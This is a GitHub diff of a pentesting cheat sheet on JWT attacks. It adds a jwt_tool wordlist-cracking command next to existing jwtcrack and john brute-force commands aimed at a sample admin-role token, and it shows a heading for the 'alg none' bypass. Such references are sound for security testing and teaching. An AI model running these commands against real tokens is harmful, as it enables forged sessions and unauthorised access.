File tree Expand file tree Collapse file tree 1 file changed +3
-1
lines changed
Expand file tree Collapse file tree 1 file changed +3
-1
lines changed Original file line number Diff line number Diff line change @@ -47,13 +47,15 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a
4747``` bash
4848git clone https://github.com/Sjord/jwtcrack.git
4949cd jwtcrack
50-
5150# Bruteforce using crackjwt.py
5251python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
5352
5453# Bruteforce using john
5554python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
5655john jwt.john # It does not work with Kali-John
56+
57+ # https://github.com/ticarpi/jwt_tool
58+ python3 jwt_tool.py -d wordlists.txt < JWT token>
5759```
5860
5961## Modify the algorithm to None \( CVE-2015 -9235\)
You can’t perform that action at this time.
0 commit comments